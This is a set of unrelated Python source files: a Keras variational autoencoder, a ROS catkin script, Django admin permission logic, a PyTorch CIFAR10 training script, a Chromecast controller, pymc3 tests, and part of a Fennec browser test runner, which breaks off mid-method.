assert K.backend() == "tensorflow", f"Keras should use the tensorflow backend, not {K.backend()}"
from keras.layers import Lambda, Input, Dense
from keras.models import Model
from keras.losses import mse, binary_crossentropy
# plot_model requires that pydot is installed
#from keras.utils import plot_model
#from toolbox import toolbox
from network import VariationalAutoencoder
from network.keras_tensorflow import Network as KerasNetwork
class KerasAutoencoder(VariationalAutoencoder, KerasNetwork):
"""A (variational) autoencoder implemented in Keras.
Attributes
----------
_vae
_encoder
_decoder
_inputs
_outputs
_epochs
_batch_size
_weights_file
_mse
"""
def __init__(self, original_dim, *args, intermediate_dim: int=512,
latent_dim: int=2, loss: str='mse', **kwargs):
"""Construct a new, fully connected (dense) autoencoder.
        Both the encoder and the decoder will have one intermediate layer
        of the given dimension.
"""
logger.info(f"New VAE: {original_dim}/{intermediate_dim}/{latent_dim}")
super().__init__(*args, **kwargs)
self._original_dim = original_dim
self._intermediate_dim = intermediate_dim
self._latent_dim = latent_dim
self._loss = loss
def _compute_layer_ids(self):
return [] # FIXME[concept]: what layer ids do we want to provide here?
def _prepare(self):
super()._prepare()
# network parameters
input_shape = (self._original_dim, )
# VAE model = encoder + decoder
with self._graph.as_default():
#
# (1) build encoder model
#
self._inputs = Input(shape=input_shape, name='encoder_input')
print("intput_shape:", input_shape,
"intermediate_dim:", self._intermediate_dim)
print("intputs:", self._inputs)
x = Dense(self._intermediate_dim, activation='relu')(self._inputs)
self._z_mean = Dense(self._latent_dim, name='z_mean')(x)
self._z_log_var = Dense(self._latent_dim, name='z_log_var')(x)
# Use reparameterization trick to push the sampling out as
# input (note that "output_shape" isn't necessary with the
# TensorFlow backend)
self._z = Lambda(self._sampling, output_shape=(self._latent_dim,),
name='z')([self._z_mean, self._z_log_var])
# instantiate encoder model. It provides two outputs:
# - (z_mean, z_log_var): a pair describing the mean and (log)
# variance of the code variable z (for input x)
# - z: a value sampled from that distribution
self._encoder = Model(self._inputs,
[self._z_mean, self._z_log_var, self._z],
name='encoder')
self._encoder.summary(print_fn=self._print_fn)
# plot_model requires pydot
#plot_model(self._encoder, to_file='vae_mlp_encoder.png',
# show_shapes=True)
#
# (2) build decoder model
#
latent_inputs = Input(shape=(self._latent_dim,), name='z_sampling')
x = Dense(self._intermediate_dim, activation='relu')(latent_inputs)
self._outputs = Dense(self._original_dim, activation='sigmoid')(x)
# instantiate decoder model
self._decoder = Model(latent_inputs, self._outputs, name='decoder')
self._decoder.summary(print_fn=self._print_fn)
# plot_model require pydot installed
#plot_model(self._decoder, to_file='vae_mlp_decoder.png', show_shapes=True)
#
# (3) define the loss function
#
self._outputs = self._decoder(self._encoder(self._inputs)[2])
if self._loss == 'mse':
reconstruction_loss = mse(self._inputs, self._outputs)
else:
reconstruction_loss = binary_crossentropy(self._inputs,
self._outputs)
# VAE loss = mse_loss or xent_loss + kl_loss
reconstruction_loss *= self._original_dim
kl_loss = (1 + self._z_log_var -
K.square(self._z_mean) - K.exp(self._z_log_var))
kl_loss = K.sum(kl_loss, axis=-1)
kl_loss *= -0.5
vae_loss = K.mean(reconstruction_loss + kl_loss)
#
# (4) instantiate VAE model
#
self._vae = Model(self._inputs, self._outputs, name='vae_mlp')
self._vae.add_loss(vae_loss)
self._vae.compile(optimizer='adam')
self._vae.summary(print_fn=self._print_fn)
self._model = self._vae
def _unprepare(self) -> None:
self._model = None
self._vae = None
self._inputs = None
self._z_mean = None
self._z_log_var = None
self._z = None
self._encoder = None
self._outputs = None
self._decoder = None
super()._unprepare()
def _print_fn(self, line):
logger.info(line)
# use the reparameterization trick:
# instead of sampling from Q(z|X), sample eps = N(0,I)
# z = z_mean + sqrt(var)*eps
def _sampling(self, args):
"""Reparameterization trick by sampling fr an isotropic unit
Gaussian.
Arguments
---------
args (tensor): mean and log of variance of Q(z|X)
Returns
-------
z (tensor): sampled latent vector
"""
z_mean, z_log_var = args
batch = K.shape(z_mean)[0]
dim = K.int_shape(z_mean)[1]
# by default, random_normal has mean=0 and std=1.0
epsilon = K.random_normal(shape=(batch, dim))
return z_mean + K.exp(0.5 * z_log_var) * epsilon
def train(self, data, validation, epochs, batch_size, progress):
#toolbox.acquire()
with self._graph.as_default():
with self._session.as_default():
self._vae.fit(data,
epochs=epochs,
verbose=0,
batch_size=batch_size,
validation_data=(validation, None),
callbacks=[progress])
#toolbox.release()
def encode(self, data, batch_size=None):
with self._graph.as_default():
with self._session.as_default():
z_mean, _, _ = \
self._encoder.predict(data, batch_size=batch_size)
return z_mean
def decode(self, data, batch_size=None):
with self._graph.as_default():
with self._session.as_default():
x_decoded = \
self._decoder.predict(data, batch_size=batch_size)
return x_decoded
def reconstruct(self, data, batch_size=None):
with self._graph.as_default():
with self._session.as_default():
reconstruction = self._vae.predict(data, batch_size=batch_size)
return reconstruction
def sample_code(self, input=None, params=None, n=1, batch_size=None):
"""Sample code values, either for given input values,
or for given parameters.
"""
with self._graph.as_default():
with self._session.as_default():
feed_dict = {}
if params is not None:
z_mean = params['z_mean']
                if not isinstance(z_mean, np.ndarray):
                    z_mean = np.full(n, z_mean)
                feed_dict[self._z_mean] = z_mean
                z_log_var = params['z_log_var']
                if not isinstance(z_log_var, np.ndarray):
                    z_log_var = np.full(n, z_log_var)
                feed_dict[self._z_log_var] = z_log_var
z = self._z.eval(feed_dict=feed_dict)
elif input is not None:
                _, _, z = \
self._encoder.predict(input, batch_size=batch_size)
return z
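def _demo_reparameterization(z_mean, z_log_var, seed=0):
    """Standalone numpy sketch (illustration only) of the reparameterization
    trick implemented in _sampling above: sample eps ~ N(0, I) and shift and
    scale it, so gradients can flow through z_mean and z_log_var."""
    rng = np.random.RandomState(seed)
    epsilon = rng.normal(size=np.shape(z_mean))
    return z_mean + np.exp(0.5 * z_log_var) * epsilon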
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/kinetic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/kinetic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/chenz16/Desktop/Rover/install_isolated;/opt/ros/kinetic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/chenz16/Desktop/Rover/devel_isolated/mrobot_navigation/env.sh')
output_filename = '/home/chenz16/Desktop/Rover/build_isolated/mrobot_navigation/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
from django.contrib import admin
from django.contrib.auth.admin import GroupAdmin as BaseGroupAdmin
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin
from regions.models import StgLocation
from django.contrib.admin.models import LogEntry
from .models import CustomUser, CustomGroup,AhodctUserLogs
from . import models
from django.forms import TextInput,Textarea # customize textarea row and column
from django_admin_listfilter_dropdown.filters import (
DropdownFilter, RelatedDropdownFilter, ChoiceDropdownFilter,
RelatedOnlyDropdownFilter) #custom
@admin.register(models.CustomUser)
class UserAdmin (UserAdmin):
from django.db import models
formfield_overrides = {
models.CharField: {'widget': TextInput(attrs={'size':'100'})},
models.TextField: {'widget': Textarea(attrs={'rows':3, 'cols':100})},
}
"""
We don't need to show list of permissions for non superuser admins. They
just need to assign the groups which already are linked to the permissions
"""
def get_fieldsets(self, request, obj=None):
fieldsets = super(UserAdmin, self).get_fieldsets(request, obj)
        # This method hides permission and superuser attributes on the model form
remove_fields = ['user_permissions','is_superuser']
if not request.user.is_superuser:
            if len(fieldsets) > 0:
                for f in fieldsets:
                    if f[0] == 'Account Permissions':
                        f[1]['fields'] = tuple(
                            x for x in f[1]['fields']
                            if x not in remove_fields)
                        break
return fieldsets
"""
For non superusers, eg. Country admins, if they need to assign groups to
other users, we only need to show groups in the Country admins location
"""
def get_form(self, request, obj=None, **kwargs):
form = super(UserAdmin, self).get_form(request, obj, **kwargs)
if not request.user.is_superuser:
            filtered_groups = CustomGroup.objects.filter(
                location=request.user.location)
            if form.base_fields.get('groups'):
                form.base_fields['groups'].queryset = filtered_groups
return form
"""
The purpose of this method is to delegate limited role of creatting users
and groups to a non-superuser. This is achieved by assigning logged in user
location to the user being created.
"""
def save_model(self, request, obj, form, change):
req_user = request.user
if not req_user.is_superuser:
obj.location = req_user.location
super().save_model(request, obj, form, change)
"""
The purpose of this method is to filter displayed list of users to location
of logged in user
"""
def get_queryset(self, request):
qs = super().get_queryset(request)
        # Get a queryset of groups the user belongs to, flattened into a list
        groups = list(request.user.groups.values_list('user', flat=True))
        user = request.user.id
        user_location = request.user.location
        if request.user.is_superuser:
            pass  # superusers see all instances
elif user in groups: # Fetch all instances of group membership
qs=qs.filter(location=user_location)
else:
qs=qs.filter(username=user)
return qs
def formfield_for_foreignkey(self, db_field, request =None, **kwargs):
groups = list(request.user.groups.values_list('user', flat=True))
user = request.user.id
user_location = request.user.location.location_id
db_locations = StgLocation.objects.all().order_by('location_id')
language = request.LANGUAGE_CODE
if db_field.name == "location":
if request.user.is_superuser:
kwargs["queryset"] = StgLocation.objects.all().order_by(
'location_id')
            # Look up location levels up to the country level
elif user in groups and user_location==1:
kwargs["queryset"] = StgLocation.objects.filter(
locationlevel__locationlevel_id__gte=1,
locationlevel__locationlevel_id__lte=2).order_by(
'location_id')
else:
kwargs["queryset"] = StgLocation.objects.filter(
location_id=request.user.location_id).filter(
translations__language_code=language).distinct()
return super().formfield_for_foreignkey(db_field, request,**kwargs)
readonly_fields = ('last_login','date_joined',)
fieldsets = (
('Personal info', {'fields': ('title','first_name', 'last_name',
'gender','location')}),
('Login Credentials', {'fields': ('email', 'username',)}),
('Account Permissions', {'fields': ('is_active', 'is_staff',
'is_superuser', 'groups', 'user_permissions')}),
('Login Details', {'fields': ('last_login',)}),
)
limited_fieldsets = (
        ('Personal Details', {'fields': ('email',)}),
('Personal info', {'fields': ('first_name', 'last_name','location')}),
('Important dates', {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
('Contacts and Password', {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2')}
),
)
list_select_related = ('location',)
list_display = ['first_name','last_name','username','email','gender',
'location','last_login']
list_display_links = ['first_name','last_name','username','email']
admin.site.unregister(Group)# Unregister the group in order to use custom group
@admin.register(models.CustomGroup)
class GroupAdmin(BaseGroupAdmin):
def get_queryset(self, request):
qs = super().get_queryset(request)
        # Get a queryset of groups the user belongs to, flattened into a list
        groups = list(request.user.groups.values_list('user', flat=True))
        user = request.user.id
        user_location = request.user.location
        if request.user.is_superuser:
            pass  # superusers see all instances
elif user in groups: # Fetch all instances of group membership
qs=qs.filter(location=user_location)
else:
qs=qs.filter(username=user)
return qs
"""
The purpose of this method is to restrict display of permission selections
in the listbox. Only permissions asigned to logged in user group are loaded.
"""
def get_form(self, request, obj=None, **kwargs):
form = super(GroupAdmin, self).get_form(request, obj, **kwargs)
if not request.user.is_superuser:
filtered_groups = CustomGroup.objects.filter(
location=request.user.location)
user_permissions = [f.permissions.all() for f in filtered_groups][0]
if form.base_fields.get('permissions'):
form.base_fields['permissions'].queryset = user_permissions
return form
def formfield_for_foreignkey(self, db_field, request =None, **kwargs):
        language = request.LANGUAGE_CODE  # get the language code, e.g. 'fr', from the request
if not request.user.is_superuser:
user_location = request.user.location
if db_field.name == "location":
kwargs["queryset"] = StgLocation.objects.filter(
location_id=user_location.location_id).filter(
translations__language_code=language).distinct()
return super().formfield_for_foreignkey(db_field, request,**kwargs)
list_display = ['name','location','roles_manager']
list_select_related = ('role','location',)
# This unmanaged model allows the super admin to track user activities
@admin.register(AhodctUserLogs)
class AhoDCT_LogsAdmin(admin.ModelAdmin):
    # This method removes the delete action from the admin interface
def has_delete_permission(self, request, obj=None):
return False
    # This method removes the add button from the admin interface
def has_add_permission(self, request, obj=None):
return False
    # This method removes the save buttons from the model form
def changeform_view(self,request,object_id=None,form_url='',
extra_context=None):
extra_context = extra_context or {}
extra_context['show_save_and_continue'] = False
extra_context['show_save'] = False
return super(AhoDCT_LogsAdmin, self).changeform_view(
request, object_id, extra_context=extra_context)
list_display=['username','email','first_name', 'last_name',
'location_translation','app_label','record_name','action','action_time',
'last_login',]
readonly_fields = ('username','email','first_name', 'last_name',
'location_translation','app_label','record_name','action','action_time',
'last_login',)
search_fields = ('username','email','first_name', 'last_name',
'location_translation','app_label','record_name','action',)
list_filter = (
('record_name', DropdownFilter,),
('app_label', DropdownFilter,),
('location_translation', DropdownFilter,),
('action', DropdownFilter),
)
ordering = ('-action_time',)
|
"""Fred: Train CIFAR10 with PyTorch.
Epoch: 0
[================================================================>] Step: 1s633ms | Tot: 1m49s | Loss: 1.797 | Acc: 33.956% (16978/50000) 391/391
[================================================================>] Step: 71ms | Tot: 9s672ms | Loss: 1.445 | Acc: 45.800% (4580/10000) 100/100
Saving..
Epoch: 1
[================================================================>] Step: 172ms | Tot: 1m42s | Loss: 1.341 | Acc: 51.022% (25511/50000) 391/391
[================================================================>] Step: 76ms | Tot: 7s520ms | Loss: 1.193 | Acc: 57.370% (5737/10000) 100/100
Saving..
Epoch: 228
[================================================================>] Step: 185ms | Tot: 1m36s | Loss: 0.002 | Acc: 99.992% (49996/50000) 391/391
[================================================================>] Step: 75ms | Tot: 7s198ms | Loss: 0.187 | Acc: 95.160% (9516/10000) 100/100
"""
""" Trial 2
Epoch: 221
[================================================================>] Step: 67ms | Tot: 54s743ms | Loss: 0.002 | Acc: 100.000% (50000/50000) 391/391
root-INFO: Number of zero_grads (2867200/5243680)
[================================================================>] Step: 26ms | Tot: 2s648ms | Loss: 0.176 | Acc: 95.300% (9530/10000) 100/100
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import numpy as np
import torchvision
import torchvision.transforms as transforms
import time
import os
import argparse
import logging
import sys
from models import *
from utils import progress_bar
from tqdm import tqdm
# from torchsummary import summary
# from ptflops import get_model_complexity_info
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true',
help='resume from checkpoint')
parser.add_argument('--zero_grad_mea', default=True, type=bool,
                    help='monitor the zero grad')  # caveat: type=bool treats any non-empty string as True
parser.add_argument('--epochs', default=300, type=int, help='assigned running epochs')
# parser.add_argument('--zero_grad_mea', default=False, type=bool, help='if the num_zero_error_grad fn will be activated')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 1  # start from epoch 1 or the last checkpoint epoch
# Data
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(
root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(
trainset, batch_size=128, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(
root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(
testset, batch_size=100, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer',
'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
# net = VGG('VGG19')
# net = PreActResNet18()
# net = GoogLeNet()
# net = DenseNet121()
# net = ResNeXt29_2x64d()
# net = MobileNet()
# net = MobileNetV2()
# net = DPN92()
# net = ShuffleNetG2()
# net = SENet18()
# net = ShuffleNetV2(1)
# net = EfficientNetB0()
# net = RegNetX_200MF()
# net = SimpleDLA()
net = ResNet18(zero_grad_mea=args.zero_grad_mea)
# net = AlexNet(zero_grad_mea=args.zero_grad_mea)
net = net.to(device)
# net_name = 'alexnet'
net_name = 'resnet'
if device == 'cuda':
# net = torch.nn.DataParallel(net)
net.cuda()
cudnn.benchmark = True
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'
checkpoint = torch.load('./checkpoint/ckpt.pth')
net.load_state_dict(checkpoint['net'])
best_acc = checkpoint['acc']
start_epoch = checkpoint['epoch']
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr,
momentum=0.9, weight_decay=5e-4)
# this one could also get 86.38% accuracy in 5_27_15_46_log
# scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=70, gamma=0.1)
# Logging
if not os.path.exists('logging'):
os.makedirs('logging')
localtime = time.localtime(time.time())
time_str = str(localtime.tm_mon) + '_' + str(localtime.tm_mday) + '_' + str(localtime.tm_hour) + '_' + str(
localtime.tm_min)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%m-%d %H:%M:%S',
filename='./logging/' + net_name + '_' + time_str + format(args.lr, '.0e') + '_log.txt',
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler(stream=sys.stdout)
console.setLevel(logging.INFO)  # INFO on the console keeps stdout concise; DEBUG records go to the log file only
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)s-%(levelname)s: %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logger = logging.getLogger()
logger.addHandler(console)
logging.info('Arguments:')
logging.info(args.__dict__)
print("=== Model ===")
print(net)
# summary(net, input_size=(3, 32, 32), device='cuda')
# with torch.cuda.device(0):
# macs, params = get_model_complexity_info(net, (3, 32, 32), as_strings=True, print_per_layer_stat=True,
# verbose=True)
# print('{:<30} {:<8}'.format('Computational complexity: ', macs))
# print('{:<30} {:<8}'.format('Number of parameters: ', params))
# Training
def train(epoch):
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(tqdm(trainloader, disable=True)): # disable tqdm by true
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
# logging.info('Accu: {:.3f}%'.format(100. * correct / total))
def test(epoch):
global best_acc
global best_acc_epoch
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
acc = 100. * correct / total
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss / (batch_idx + 1), acc, correct, total))
# Save checkpoint.
if acc > best_acc:
# print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
torch.save(state, './checkpoint/ckpt.pth')
best_acc_epoch = epoch
best_acc = acc
return acc, best_acc, best_acc_epoch
def num_zero_error_grad(model):
"""
Return the number of zero gradients and total number of gradients,
can only be used with prune_flag = True for now
"""
    if model is None:
        return 0, 0, []
zeros, total = 0, 0
non_zero_indices_list = []
if isinstance(model, AlexNet):
for module in model.children():
if isinstance(module, (GradConv2d, GradLinear)): # comment this line to enable for noPrune
flat_g = module.error_grad.cpu().numpy().flatten()
zeros += np.sum(flat_g == 0)
total += len(flat_g)
non_zero_indices_list = np.where(flat_g != 0)
elif isinstance(module, nn.Sequential):
for layer in module:
# for layer in bblock:
if isinstance(layer, (GradConv2d, GradLinear)):
# print('yes')
flat_g = layer.error_grad.cpu().numpy().flatten()
zeros += np.sum(flat_g == 0)
total += len(flat_g)
non_zero_indices_list = np.where(flat_g != 0)
else:
raise ValueError('The modules involved are not registered for this fn, supports alexnet only')
elif isinstance(model, ResNet):
for module in model.children():
for layer in module:
# for each layer
zero_grad, sum_g = 0, 0
if isinstance(layer, (GradConv2d, GradLinear)): # for conv1 & fc6, comment this line to enable for noprune
flat_g = layer.error_grad.cpu().numpy().flatten()
zero_grad = np.sum(flat_g == 0)
zeros += zero_grad
sum_g = len(flat_g)
total += sum_g
# non_zero_idices = np.where(flat_g != 0)
# zero_grad of this layer write into df
# layers_zero_grad_list.append(zero_grad / sum_g)
# print('testing: this layer is {}, with the idx {}'.format(layer, idx_layer))
elif isinstance(layer, BasicBlock):
                    flat_g = np.concatenate([layer.conv1.error_grad.cpu().numpy().flatten(),
                                             layer.conv2.error_grad.cpu().numpy().flatten()])
zero_grad = np.sum(flat_g == 0)
zeros += zero_grad
sum_g = len(flat_g)
total += sum_g
# non_zero_idices = np.where(flat_g != 0)
# zero_grad of this layer write into df
# layers_zero_grad_list.append(zero_grad / sum_g)
# print('testing: this layer is {}, with the idx {}'.format(layer, idx_layer))
if layer.shortcut: # check if the sequential object shortcut is not empty
zero_grad, sum_g = 0, 0
flat_g = layer.shortcut[0].error_grad.cpu().numpy().flatten()
zero_grad = np.sum(flat_g == 0)
zeros += zero_grad
sum_g = len(flat_g)
total += sum_g
# zero_grad of this layer write into df
# layers_zero_grad_list.append(zero_grad / sum_g)
# # print('testing: this layer is {}, with the idx {}'.format(layer.shortcut, idx_layer))
# idx_layer += 1
else:
raise ValueError('The error grad measurement supports resnet & alexnet for now')
return int(zeros), int(total), non_zero_indices_list
zero_grads_percentage_list = []
for epoch in range(start_epoch, start_epoch + args.epochs):
train(epoch)
if args.zero_grad_mea:
curr_zero_grads, num_grads, non_zero_indices = num_zero_error_grad(net)
logging.info("[Epoch: {}] Number of zero_grads ({}/{})={:.2%}".format(epoch, curr_zero_grads, num_grads,
curr_zero_grads / num_grads))
# print("Non zero indices is {}".format(non_zero_indices))
grad_per = 100. * curr_zero_grads / num_grads
zero_grads_percentage_list.append(np.around(grad_per, 2))
accu, best_accu, best_accu_epoch = test(epoch)
logging.info("[Epoch: {}] Testing Accu: {}%".format(epoch, accu))
if epoch == args.epochs:
logging.info("[Epoch: {}] has the max accuracy of {}%".format(best_accu_epoch, best_accu))
scheduler.step()
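def _demo_zero_grad_ratio():
    """Minimal sketch (illustration only) of the bookkeeping performed by
    num_zero_error_grad, on a plain array instead of GradConv2d/GradLinear
    modules."""
    g = np.array([0., 0.3, 0., -1.2, 0.])
    zeros, total = int(np.sum(g == 0)), g.size
    return zeros, total  # -> (3, 5), i.e. 60% zero gradients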
|
from pychromecast.controllers import BaseController
class PixelController(BaseController):
def __init__(self):
super(PixelController, self).__init__("urn:x-cast:de.ytvwld.pixelcast")
def receive_message(self, message, data):
print("Received message: {}".format(data))
return True
def draw(self, x, y, r, g, b):
self.send_message({
"command": "draw",
"x": x,
"y": y,
"r": r,
"g": g,
"b": b
})
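# Usage sketch (hedged: assumes a Chromecast on the local network running the
# matching receiver app; discovery details vary across pychromecast versions):
#   import pychromecast
#   chromecasts, browser = pychromecast.get_chromecasts()
#   cast = chromecasts[0]
#   cast.wait()
#   controller = PixelController()
#   cast.register_handler(controller)
#   controller.draw(0, 0, 255, 0, 0)  # draw a red pixel at the origin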
|
import numpy as np
import pymc3 as pm
import theano.tensor as tt
from sampled import sampled
SEED = 1
def test_sampled_one_model():
@sampled
def just_a_normal():
pm.Normal('x', mu=0, sd=1)
kwargs = {
'draws': 50,
'tune': 50,
'init': None
}
np.random.seed(SEED)
with just_a_normal():
decorated_trace = pm.sample(**kwargs)
np.random.seed(SEED)
with pm.Model():
pm.Normal('x', mu=0, sd=1)
normal_trace = pm.sample(**kwargs)
assert decorated_trace.varnames == ['x']
np.testing.assert_array_equal(decorated_trace.get_values('x'), normal_trace.get_values('x'))
def test_reuse_model():
@sampled
def two_normals():
mu = pm.Normal('mu', mu=0, sd=1)
pm.Normal('x', mu=mu, sd=1)
with two_normals():
generated_data = pm.sample(draws=50, tune=50, init=None)
for varname in ('mu', 'x'):
assert varname in generated_data.varnames
with two_normals(mu=1):
posterior_data = pm.sample(draws=50, tune=50, init=None)
assert 'x' in posterior_data.varnames
assert 'mu' not in posterior_data.varnames
assert posterior_data.get_values('x').mean() > generated_data.get_values('x').mean()
def test_linear_model():
rows, cols = 100, 10
X = np.random.normal(size=(rows, cols))
w = np.random.normal(size=cols)
y = X.dot(w) + np.random.normal(scale=0.1, size=rows)
@sampled
def linear_model(X, y):
shape = X.shape
X = pm.Normal('X', mu=np.mean(X, axis=0), sd=np.std(X, axis=0), shape=shape)
coefs = pm.Normal('coefs', mu=tt.zeros(shape[1]), sd=tt.ones(shape[1]), shape=shape[1])
pm.Normal('y', mu=tt.dot(X, coefs), sd=tt.ones(shape[0]), shape=shape[0])
with linear_model(X=X, y=y):
sampled_coefs = pm.sample(draws=1000, tune=500)
mean_coefs = sampled_coefs.get_values('coefs').mean(axis=0)
np.testing.assert_allclose(mean_coefs, w, atol=0.1)
def test_partial_model():
rows, cols = 100, 10
X = np.random.normal(size=(rows, cols))
w = np.random.normal(size=cols)
y = X.dot(w) + np.random.normal(scale=0.1, size=rows)
@sampled
def partial_linear_model(X):
shape = X.shape
X = pm.Normal('X', mu=np.mean(X, axis=0), sd=np.std(X, axis=0), shape=shape)
pm.Normal('coefs', mu=tt.zeros(shape[1]), sd=tt.ones(shape[1]), shape=shape[1])
with partial_linear_model(X=X) as model:
coefs = model.named_vars['coefs']
pm.Normal('y', mu=tt.dot(X, coefs), sd=tt.ones(y.shape), observed=y)
sampled_coefs = pm.sample(draws=1000, tune=500)
mean_coefs = sampled_coefs.get_values('coefs').mean(axis=0)
np.testing.assert_allclose(mean_coefs, w, atol=0.1)
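# A minimal sketch (assumption: NOT the actual `sampled` package) of how such a
# decorator can defer model construction, so one function builds a fresh model
# per `with` block. The real package additionally substitutes keyword arguments
# for same-named random variables (which is why 'mu' vanishes from varnames in
# test_reuse_model); that substitution is omitted here.
from contextlib import contextmanager
def sampled_sketch(model_fn):
    @contextmanager
    def wrapper(**kwargs):
        with pm.Model() as model:
            model_fn(**kwargs)
            yield model
    return wrapper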
|
import os
import tempfile
import moznetwork
from mozprocess import ProcessHandler
from mozprofile import FirefoxProfile
from mozrunner import FennecEmulatorRunner
from tools.serve.serve import make_hosts_file
from .base import (get_free_port,
cmd_arg,
browser_command)
from ..executors.executormarionette import (MarionetteTestharnessExecutor, # noqa: F401
MarionetteRefTestExecutor) # noqa: F401
from .firefox import (get_timeout_multiplier, # noqa: F401
run_info_browser_version,
update_properties, # noqa: F401
executor_kwargs, # noqa: F401
FirefoxBrowser) # noqa: F401
__wptrunner__ = {"product": "fennec",
"check_args": "check_args",
"browser": "FennecBrowser",
"executor": {"testharness": "MarionetteTestharnessExecutor",
"reftest": "MarionetteRefTestExecutor"},
"browser_kwargs": "browser_kwargs",
"executor_kwargs": "executor_kwargs",
"env_extras": "env_extras",
"env_options": "env_options",
"run_info_extras": "run_info_extras",
"update_properties": "update_properties",
"timeout_multiplier": "get_timeout_multiplier"}
def check_args(**kwargs):
pass
def browser_kwargs(test_type, run_info_data, config, **kwargs):
return {"package_name": kwargs["package_name"],
"device_serial": kwargs["device_serial"],
"prefs_root": kwargs["prefs_root"],
"extra_prefs": kwargs["extra_prefs"],
"test_type": test_type,
"debug_info": kwargs["debug_info"],
"symbols_path": kwargs["symbols_path"],
"stackwalk_binary": kwargs["stackwalk_binary"],
"certutil_binary": kwargs["certutil_binary"],
"ca_certificate_path": config.ssl_config["ca_cert_path"],
"stackfix_dir": kwargs["stackfix_dir"],
"binary_args": kwargs["binary_args"],
"timeout_multiplier": get_timeout_multiplier(test_type,
run_info_data,
**kwargs),
"leak_check": kwargs["leak_check"],
"stylo_threads": kwargs["stylo_threads"],
"chaos_mode_flags": kwargs["chaos_mode_flags"],
"config": config,
"install_fonts": kwargs["install_fonts"],
"tests_root": config.doc_root}
def env_extras(**kwargs):
return []
def run_info_extras(**kwargs):
package = kwargs["package_name"]
rv = {"e10s": True if package is not None and "geckoview" in package else False,
"headless": False,
"sw-e10s": False}
rv.update(run_info_browser_version(kwargs["binary"]))
return rv
def env_options():
    # The server host is set to the machine's local network IP so that
    # resources can be accessed from the Android emulator
return {"server_host": moznetwork.get_ip(),
"bind_address": False,
"supports_debugger": True}
def write_hosts_file(config, device):
new_hosts = make_hosts_file(config, moznetwork.get_ip())
current_hosts = device.get_file("/etc/hosts")
if new_hosts == current_hosts:
return
hosts_fd, hosts_path = tempfile.mkstemp()
try:
with os.fdopen(hosts_fd, "w") as f:
f.write(new_hosts)
device.remount()
device.push(hosts_path, "/etc/hosts")
finally:
os.remove(hosts_path)
class FennecBrowser(FirefoxBrowser):
init_timeout = 300
shutdown_timeout = 60
def __init__(self, logger, prefs_root, test_type, package_name=None,
device_serial="emulator-5444", **kwargs):
FirefoxBrowser.__init__(self, logger, None, prefs_root, test_type, **kwargs)
self._package_name = package_name
self.device_serial = device_serial
self.tests_root = kwargs["tests_root"]
self.install_fonts = kwargs["install_fonts"]
self.stackwalk_binary = kwargs["stackwalk_binary"]
@property
def package_name(self):
